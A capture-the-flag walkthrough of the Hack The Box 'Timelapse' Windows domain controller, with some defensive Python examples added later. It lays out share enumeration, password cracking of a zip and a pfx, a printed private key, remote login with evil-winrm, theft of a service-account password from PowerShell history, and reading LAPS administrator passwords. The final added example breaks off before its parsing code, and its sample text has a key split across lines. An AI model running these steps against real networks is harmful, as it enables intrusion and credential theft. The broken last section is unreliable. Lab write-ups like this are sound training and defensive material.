Timelapse is one of the machines currently available on the HackTheBox hacking platform, rated Easy.
In this case it is a machine based on the Windows operating system.
Port scanning
As usual, we add the IP of the Timelapse machine, 10.10.11.152, to /etc/hosts as timelapse.htb and start with the nmap port scan.
```
nmap -sV -sC -oA enumeration/nmap1 -Pn 10.10.11.152
Nmap scan report for 10.10.11.152
Host is up (0.046s latency).
Not shown: 992 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  tcpwrapped
3269/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m59s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-07-22T21:59:23
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 22 14:00:00 2022 -- 1 IP address (1 host up) scanned in 71.23 seconds
```
A first scan shows several interesting ports: DNS, LDAP, kpasswd5 and SMB on a host named DC01, which marks it as the domain controller for timelapse.htb. Let's see what we can get out of them.
Enumeration
We start by enumerating the SMB service, and we can list the shares without needing any credentials.
```
$ smbclient -L //10.10.11.152 -N

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Shares          Disk
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
```
We have access, so let's see if we can get anything more out of any of the shares; we find several files in the Shares share.
```
$ smbclient //10.10.11.152/Shares/
Enter WORKGROUP\asdf's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 15:39:15 2021
  ..                                  D        0  Mon Oct 25 15:39:15 2021
  Dev                                 D        0  Mon Oct 25 19:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 15:48:42 2021

                6367231 blocks of size 4096. 1293571 blocks available
```
So we go through each directory and download its contents to examine them more closely.
```
smb: \> cd Dev
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 19:40:06 2021
  ..                                  D        0  Mon Oct 25 19:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 15:46:42 2021

                6367231 blocks of size 4096. 1294022 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (4,0 KiloBytes/sec) (average 4,0 KiloBytes/sec)
smb: \Dev\> cd ..
smb: \> ls
  .                                   D        0  Mon Oct 25 15:39:15 2021
  ..                                  D        0  Mon Oct 25 15:39:15 2021
  Dev                                 D        0  Mon Oct 25 19:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 15:48:42 2021

                6367231 blocks of size 4096. 1292659 blocks available
smb: \> cd HelpDesk
smb: \HelpDesk\> ls
  .                                   D        0  Mon Oct 25 15:48:42 2021
  ..                                  D        0  Mon Oct 25 15:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 14:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 14:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 14:57:40 2021
  LAPS_TechnicalSpecification.docx    A    72683  Mon Oct 25 14:57:44 2021

                6367231 blocks of size 4096. 1291349 blocks available
smb: \HelpDesk\> get LAPS.x64.msi
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (1130,4 KiloBytes/sec) (average 680,7 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_Datasheet.docx
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (208,5 KiloBytes/sec) (average 570,6 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_OperationsGuide.docx
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (1038,7 KiloBytes/sec) (average 675,1 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_TechnicalSpecification.docx
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (114,1 KiloBytes/sec) (average 570,1 KiloBytes/sec)
smb: \HelpDesk\>
```
We look at the zip file first; it contains a pfx file.
```
$ unzip -v winrm_backup.zip
Archive:  winrm_backup.zip
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
--------  ------  ------- ---- ---------- ----- --------  ----
    2555  Defl:N     2393   6% 2021-10-25 14:21 12ec5683  legacyy_dev_auth.pfx
--------          -------  ---                            -------
    2555             2393   6%                            1 file
```
If we try to extract the contents, we find they are password-protected.
```
$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
   skipping: legacyy_dev_auth.pfx    incorrect password
```
So we use fcrackzip to break the encryption and recover the password.
```
$ fcrackzip -D -u winrm_backup.zip -p /usr/share/wordlists/rockyou.txt


PASSWORD FOUND!!!!: pw == supremelegacy
```
That was easier than it looked, so we extract the contents.
```
$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
  inflating: legacyy_dev_auth.pfx
```
But now we have another problem: a different password is needed to extract the private key and the certificate from the pfx file. In this case we use john to recover that password so we can extract the contents.
First we extract the hash from the file with pfx2john.
```
$ python3 /home/asdf/github/JohnTheRipper/run/pfx2john.py legacyy_dev_auth.pfx > legacyy_dev_auth.hash
```
And then we run john against that hash to recover the password.
```
$ john -w=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.hash --rule /usr/share/john/rules/rockyou-30000.rule
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)
1g 0:00:01:27 DONE (2022-07-22 14:23) 0.01138g/s 36785p/s 36785c/s 36785C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Now that we have the password, let's extract the contents with openssl.
We extract the private key
```
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key -nodes
```
whose content is
```
Bag Attributes
    Microsoft Local Key set: <No Values>
    localKeyID: 01 00 00 00
    friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b
    Microsoft CSP Name: Microsoft Software Key Storage Provider
Key Attributes
    X509v3 Key Usage: 90
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQClVgejYhZHHuLz
TSOtYXHOi56zSocr9om854YDu/6qHBa4Nf8xFP6INNBNlYWvAxCvKM8aQsHpv3to
pwpQ+YbRZDu1NxyhvfNNTRXjdFQV9nIiKkowOt6gG2F+9O5gVF4PAnHPm+YYPwsb
oRkYV8QOpzIi6NMZgDCJrgISWZmUHqThybFW/7POme1gs6tiN1XFoPu1zNOYaIL3
dtZaazXcLw6IpTJRPJAWGttqyFommYrJqCzCSaWu9jG0p1hKK7mk6wvBSR8QfHW2
qX9+NbLKegCt+/jAa6u2V9lu+K3MC2NaSzOoIi5HLMjnrujRoCx3v6ZXL0KPCFzD
MEqLFJHxAgMBAAECggEAc1JeYYe5IkJY6nuTtwuQ5hBc0ZHaVr/PswOKZnBqYRzW
fAatyP5ry3WLFZKFfF0W9hXw3tBRkUkOOyDIAVMKxmKzguK+BdMIMZLjAZPSUr9j
PJFizeFCB0sR5gvReT9fm/iIidaj16WhidQEPQZ6qf3U6qSbGd5f/KhyqXn1tWnL
GNdwA0ZBYBRaURBOqEIFmpHbuWZCdis20CvzsLB+Q8LClVz4UkmPX1RTFnHTxJW0
Aos+JHMBRuLw57878BCdjL6DYYhdR4kiLlxLVbyXrP+4w8dOurRgxdYQ6iyL4UmU
Ifvrqu8aUdTykJOVv6wWaw5xxH8A31nl/hWt50vEQQKBgQDYcwQvXaezwxnzu+zJ
7BtdnN6DJVthEQ+9jquVUbZWlAI/g2MKtkKkkD9rWZAK6u3LwGmDDCUrcHQBD0h7
tykwN9JTJhuXkkiS1eS3BiAumMrnKFM+wPodXi1+4wJk3YTWKPKLXo71KbLo+5NJ
2LUmvvPDyITQjsoZoGxLDZvLFwKBgQDDjA7YHQ+S3wYk+11q9M5iRR9bBXSbUZja
8LVecW5FDH4iTqWg7xq0uYnLZ01mIswiil53+5Rch5opDzFSaHeS2XNPf/Y//TnV
1+gIb3AICcTAb4bAngau5zm6VSNpYXUjThvrLv3poXezFtCWLEBKrWOxWRP4JegI
ZnD1BfmQNwKBgEJYPtgl5Nl829+Roqrh7CFti+a29KN0D1cS/BTwzusKwwWkyB7o
btTyQf4tnbE7AViKycyZVGtUNLp+bME/Cyj0c0t5SsvS0tvvJAPVpNejjc381kdN
71xBGcDi5ED2hVj/hBikCz2qYmR3eFYSTrRpo15HgC5NFjV0rrzyluZRAoGAL7s3
QF9Plt0jhdFpixr4aZpPvgsF3Ie9VOveiZAMh4Q2Ia+q1C6pCSYk0WaEyQKDa4b0
6jqZi0B6S71un5vqXAkCEYy9kf8AqAcMl0qEQSIJSaOvc8LfBMBiIe54N1fXnOeK
/ww4ZFfKfQd7oLxqcRADvp1st2yhR7OhrN1pfl8CgYEAsJNjb8LdoSZKJZc0/F/r
c2gFFK+MMnFncM752xpEtbUrtEULAKkhVMh6mAywIUWaYvpmbHDMPDIGqV7at2+X
TTu+fiiJkAr+eTa/Sg3qLEOYgU0cSgWuZI0im3abbDtGlRt2Wga0/Igw9Ewzupc8
A5ZZvI+GsHhm0Oab7PEWlRY=
-----END PRIVATE KEY-----
```
And then the certificate
```
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
```
whose content is
```
Bag Attributes
    localKeyID: 01 00 00 00
subject=CN = Legacyy
issuer=CN = Legacyy
-----BEGIN CERTIFICATE-----
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS
MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1
MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0
0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb
YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z
7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72
MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs
yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg
MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX
DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe
rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa
m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0
3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/
fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG
hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh
nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA
-----END CERTIFICATE-----
```
Now that we have the certificate and the private key, we use them to log in to the machine with evil-winrm (the command below refers to them as decrypt-private.key and certificate.pem; point -k and -c at whatever names you saved the extracted key and certificate under; the key was written with -nodes, so it is already unencrypted).
```
$ ruby /home/asdf/github/evil-winrm/evil-winrm.rb -S -k decrypt-private.key -c certificate.pem -i 10.10.11.152

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents>
```
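Why this .pfx is enough to log in over WinRM as legacyy is visible in the certificate itself: it carries the clientAuth extended key usage and a subjectAltName otherName holding the user principal name legacyy@timelapse.htb, which is what the domain controller maps to the account. The following Python script, added here as an example and not part of the original writeup, parses the certificate shown above with a minimal DER walker (standard library only) and reports those fields plus the validity period. The OID constants are the standard values; the parser assumes a well-formed DER certificate such as the one above and is not a general-purpose X.509 library.

```python
import base64
from datetime import datetime

# Client-auth certificate pulled out of legacyy_dev_auth.pfx, copied from the writeup above.
CERT_PEM = """-----BEGIN CERTIFICATE-----
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS
MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1
MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0
0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb
YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z
7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72
MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs
yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg
MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX
DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe
rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa
m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0
3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/
fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG
hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh
nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA
-----END CERTIFICATE-----"""

OID_SAN, OID_EKU = "2.5.29.17", "2.5.29.37"
OID_UPN = "1.3.6.1.4.1.311.20.2.3"      # Microsoft szOID_NT_PRINCIPAL_NAME (UPN inside otherName)
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"   # id-kp-clientAuth

def pem_to_der(pem):
    return base64.b64decode("".join(l for l in pem.splitlines() if not l.startswith("-----")))

def children(buf):
    # Split a DER buffer into its (tag, value) elements; assumes well-formed input.
    out, pos = [], 0
    while pos < len(buf):
        tag, length, pos = buf[pos], buf[pos + 1], pos + 2
        if length & 0x80:                        # long form: next n bytes hold the length
            n = length & 0x7F
            length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
        out.append((tag, buf[pos:pos + length]))
        pos += length
    return out

def decode_oid(raw):
    parts, val = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(val)
            val = 0
    return ".".join(map(str, parts))

def find_extensions(buf, exts=None):
    # Walk every constructed element; an Extension is SEQUENCE { OID, [BOOLEAN], OCTET STRING }.
    exts = {} if exts is None else exts
    items = children(buf)
    if len(items) in (2, 3) and items[0][0] == 0x06 and items[-1][0] == 0x04:
        exts[decode_oid(items[0][1])] = items[-1][1]
    for tag, val in items:
        if tag & 0x20:                           # constructed: SEQUENCE, SET, [n] EXPLICIT
            find_extensions(val, exts)
    return exts

def san_upn(der):
    # UPN carried in subjectAltName/otherName: the value AD maps to a user account.
    san = find_extensions(der).get(OID_SAN)
    if san is None:
        return None
    (_, names), = children(san)                  # GeneralNames ::= SEQUENCE OF GeneralName
    for tag, val in children(names):
        if tag == 0xA0:                          # otherName [0] { type-id, value [0] EXPLICIT }
            (_, oid), (_, explicit) = children(val)
            if decode_oid(oid) == OID_UPN:
                (_, text), = children(explicit)
                return text.decode()
    return None

def extended_key_usages(der):
    eku = find_extensions(der).get(OID_EKU)
    if eku is None:
        return []
    (_, seq), = children(eku)
    return [decode_oid(v) for t, v in children(seq) if t == 0x06]

def validity(der):
    # (notBefore, notAfter): the TBSCertificate SEQUENCE that holds exactly two UTCTime values.
    (_, body), = children(der)
    for tag, val in children(children(body)[0][1]):
        inner = children(val) if tag == 0x30 else []
        if len(inner) == 2 and all(t == 0x17 for t, _ in inner):
            return tuple(datetime.strptime(v.decode(), "%y%m%d%H%M%SZ") for _, v in inner)
    raise ValueError("no validity period found")

def assess(pem=CERT_PEM):
    # What an AD certificate mapping and a WinRM listener would see in this certificate.
    der = pem_to_der(pem)
    not_before, not_after = validity(der)
    return {"upn": san_upn(der),
            "client_auth": OID_CLIENT_AUTH in extended_key_usages(der),
            "not_after": not_after.strftime("%Y-%m-%d"),
            "lifetime_days": (not_after - not_before).days}
```

Run against the certificate above, assess() reports the UPN legacyy@timelapse.htb, clientAuth present, and a validity window of ten years ending in 2031. That lifetime is the detail a defender should notice: a client-authentication certificate this long-lived, left in a backup zip on a share readable without credentials, keeps working until it is revoked or the account's certificate mapping is removed, so the same walker is useful for inventorying which certificates in a backup set grant client authentication and for how long.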
Getting the user flag
Now that we are in, we go to the user's desktop to get our flag.
```
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..
*Evil-WinRM* PS C:\Users\legacyy> cd desktop
*Evil-WinRM* PS C:\Users\legacyy\desktop> ls

    Directory: C:\Users\legacyy\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         7/22/2022   2:26 PM             34 user.txt

*Evil-WinRM* PS C:\Users\legacyy\desktop> type user.txt
7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxb
*Evil-WinRM* PS C:\Users\legacyy\desktop>
```
Privilege escalation
The next step is to escalate privileges. Among other things, we check the user
```
*Evil-WinRM* PS C:\Users\legacyy\desktop> whoami /user

USER INFORMATION
----------------

User Name         SID
================= ============================================
timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603
```
its privileges
```
*Evil-WinRM* PS C:\Users\legacyy\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\legacyy\desktop>
```
and the account information reported by net user
```
*Evil-WinRM* PS C:\Users> net user legacyy
User name                    legacyy
Full Name                    Legacyy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/23/2021 12:17:10 PM
Password expires             Never
Password changeable          10/24/2021 12:17:10 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/22/2022 3:29:40 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *Development
The command completed successfully.
```
But we see nothing important there, so we run winPEAS to see whether it turns anything up, and we find a very interesting file: the user's PowerShell command history, with the following content
```
*Evil-WinRM* PS C:\users\legacyy\appdata\roaming\microsoft\windows\powershell\psreadline> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
```
Reviewing the file above, we see a set of credentials
```
svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
```
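PSReadLine appends every interactive command to ConsoleHost_history.txt under the user's profile, which is why the svc_deploy password survived on disk here. A lightweight check for this kind of exposure, added as an example and not taken from the writeup, scans a history file for commands that embed credentials or disable transport checks. It runs over a constructed copy of the history above with the password replaced by a placeholder; the rule names and regular expressions are my own heuristics and are not exhaustive.

```python
import re
import sys

# Constructed sample: the ConsoleHost_history.txt lines quoted in the writeup above, with the
# literal password replaced by a placeholder so the secret is not repeated here.
HISTORY = """whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString '<password-redacted>' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
"""

# Heuristic rules (my own, not exhaustive): each is (finding name, regex). A match means the
# command line itself carried a secret or weakened transport security, and PSReadLine has
# written that line to disk in clear text.
RULES = [
    ("plaintext-securestring", re.compile(r"ConvertTo-SecureString\s+(['\"]).+?\1\s+-AsPlainText", re.I)),
    ("pscredential-literal", re.compile(r"PSCredential\s*\(\s*['\"]([^'\"]+)['\"]", re.I)),
    ("tls-checks-disabled", re.compile(r"-Skip(?:CA|CN|Revocation)Check", re.I)),
    ("net-use-password", re.compile(r"\bnet\s+use\b.*\s/user:", re.I)),
]


def scan_history(text):
    """Return one finding per (line, rule) hit: {'line': n, 'rule': name, 'account': user?}."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            finding = {"line": lineno, "rule": name}
            if name == "pscredential-literal":
                finding["account"] = m.group(1)   # the account whose password is exposed
            findings.append(finding)
    return findings


def summarize(findings):
    """Collapse findings into the rules hit and the accounts that need a password rotation."""
    return {
        "rules": sorted({f["rule"] for f in findings}),
        "accounts": sorted({f["account"] for f in findings if "account" in f}),
    }


def scan_file(path):
    """Scan an on-disk history, e.g. %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_history(fh.read())


if __name__ == "__main__":
    found = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_history(HISTORY)
    for f in found:
        extra = f"  (account: {f['account']})" if "account" in f else ""
        print(f"line {f['line']:>3}: {f['rule']}{extra}")
    print(summarize(found))
```

On the sample it flags lines 4, 5 and 6 and names svc_deploy as the account whose password must be rotated; pointing scan_file at the real history path from the session above gives the same result for the live file. The usual mitigations are to keep secrets out of interactive commands (Get-Credential prompts, a credential vault) and to clear or restrict the PSReadLine history for service-account sessions.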
But rather than just noting them, let's reuse the commands already in the file and run them ourselves, so first we set up the variables
```
*Evil-WinRM* PS C:\users> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\users> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\users> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
```
and verify that they work
```
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
```
OK, that worked, so let's gather information about this user's privileges and group memberships
```
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami /priv}

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {net user svc_deploy}
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/22/2022 3:44:57 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.
```
If we look closely, the svc_deploy user belongs to the LAPS_Readers group, which means it can read the local administrator password managed by LAPS (stored in the ms-Mcs-AdmPwd attribute of each computer object). Knowing this, let's try to retrieve it.
```
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}

PSComputerName              : localhost
RunspaceId                  : ac25db9e-ba9f-45c0-810b-efc1e7477e1b
DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-Mcs-AdmPwd               : S6QY1oDB00ZB8.)8+Cc#]4m1
ms-Mcs-AdmPwdExpirationTime : 133034307686369127
Name                        : DC01
ObjectClass                 : computer
ObjectGUID                  : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName              : DC01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName           :

PSComputerName              : localhost
RunspaceId                  : ac25db9e-ba9f-45c0-810b-efc1e7477e1b
DistinguishedName           : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb
DNSHostName                 :
Enabled                     : True
Name                        : DB01
ObjectClass                 : computer
ObjectGUID                  : d38b3265-230f-47ae-bdcd-f7153da7659d
SamAccountName              : DB01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1606
UserPrincipalName           :

PSComputerName              : localhost
RunspaceId                  : ac25db9e-ba9f-45c0-810b-efc1e7477e1b
DistinguishedName           : CN=WEB01,OU=Web,OU=Servers,DC=timelapse,DC=htb
DNSHostName                 :
Enabled                     : True
Name                        : WEB01
ObjectClass                 : computer
ObjectGUID                  : 897c7cfe-ba15-4181-8f2c-a74f88952683
SamAccountName              : WEB01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1607
UserPrincipalName           :

PSComputerName              : localhost
RunspaceId                  : ac25db9e-ba9f-45c0-810b-efc1e7477e1b
DistinguishedName           : CN=DEV01,OU=Dev,OU=Servers,DC=timelapse,DC=htb
DNSHostName                 :
Enabled                     : True
Name                        : DEV01
ObjectClass                 : computer
ObjectGUID                  : 02dc961a-7a60-4ec0-a151-0472768814ca
SamAccountName              : DEV01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1608
UserPrincipalName           :
```
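The ms-Mcs-AdmPwdExpirationTime value in that output is a Windows FILETIME (100-nanosecond ticks since 1601-01-01 UTC), so it is not readable as it stands. The Python below, an added example rather than anything from the writeup, parses Format-List style output like the block above into records, converts the expiration timestamp, and reports which computers actually carry a current LAPS-managed password. The sample text is a constructed, trimmed copy of the output above with the password value replaced by a placeholder, and the as_of cut-off dates are assumptions chosen to show both outcomes.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample: the Get-ADComputer output quoted above, trimmed to the attributes the
# audit needs, with the real LAPS password value replaced by a placeholder.
AD_OUTPUT = """DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-Mcs-AdmPwd               : <redacted-local-admin-password>
ms-Mcs-AdmPwdExpirationTime : 133034307686369127
Name                        : DC01
ObjectClass                 : computer
S
amAccountName              : DC01$

DistinguishedName           : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb
DNSHostName                 :
Enabled                     : True
Name                        : DB01
ObjectClass                 : computer
SamAccountName              : DB01$

DistinguishedName           : CN=WEB01,OU=Web,OU=Servers,DC=timelapse,DC=htb
DNSHostName                 :
Enabled                     : True
Name                        : WEB01
ObjectClass                 : computer
SamAccountName              : WEB01$

DistinguishedName           : CN=DEV01,OU=Dev,OU=Servers,DC=timelapse,DC=htb
DNSHostName                 :
Enabled                     : True
Name                        : DEV01
ObjectClass                 : computer
SamAccountName              : DEV01$
"""

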